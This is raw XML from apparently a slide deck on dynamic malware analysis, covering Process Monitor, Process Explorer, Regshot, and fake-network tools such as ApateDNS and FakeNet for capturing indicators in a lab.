            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325"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Process Monitoring (procmon.exe)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="326" name="Google Shape;554;p52" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="790560" y="1700640"/>
            <a:ext cx="7994520" cy="490896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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328"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Process Monitoring –&gt; Filter</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Important fields: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Process Name</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Operation</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Detail</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Common functions: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>RegSetValue</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>WriteFile</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="329" name="Google Shape;561;p53" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547640" y="2717640"/>
            <a:ext cx="6267960" cy="407160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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331"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Process Explorer (procexp.exe)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Name</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PID</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Description</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Company</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="332" name="Google Shape;568;p54" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339640" y="1800360"/>
            <a:ext cx="6810120" cy="460008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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196640"/>
            <a:ext cx="454644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Process Explorer -&gt; Verify</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>MS uses digital signatures for most of its core executables.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Malware often replaces authentic Windows files with its own in an attempt to hide</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="335" name="Google Shape;575;p55" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5004000" y="1193760"/>
            <a:ext cx="4044240" cy="5115240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337"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Process Explorer -&gt; Compare Strings </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Compare strings contained in the disk executables (images)against strings in memory to recognize the replacements</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="338" name="Google Shape;582;p56" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267640" y="2958480"/>
            <a:ext cx="5832360" cy="3573720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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9" name="Google Shape;587;p57" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="611640" y="3069000"/>
            <a:ext cx="8010000" cy="3028680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340"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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341"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Comparing Registry snapshots by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Regshot</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="342" name="Google Shape;590;p57" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770360" y="1792440"/>
            <a:ext cx="4280760" cy="4323960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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Faking a Network</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="66000"/>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Malware often beacons out and eventually communicates with a command-and-control server. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>A fake network allows us to obtain network indicators (DNS names, IP, packet signatures) without connecting to the Internet.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Some malware can realise that it is executing in a virtualized environment (e.g. VMware).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Tools:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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ApateDNS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Netcat</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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FakeNet</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Faking a Network</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346"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ApateDNS (sdl-apateDNS)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://www.fireeye.com/services/freeware/apatedns.html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="347" name="Google Shape;603;p59" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="2144880"/>
            <a:ext cx="6620760" cy="443952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Introduction</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110"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Malicious code/Malware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>A programming code that is capable of causing harm to availability, integrity of code or data, or confidentiality in a computing system encompasses including virus, Trojan horse, worm, rootkit, scareware, spyware.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
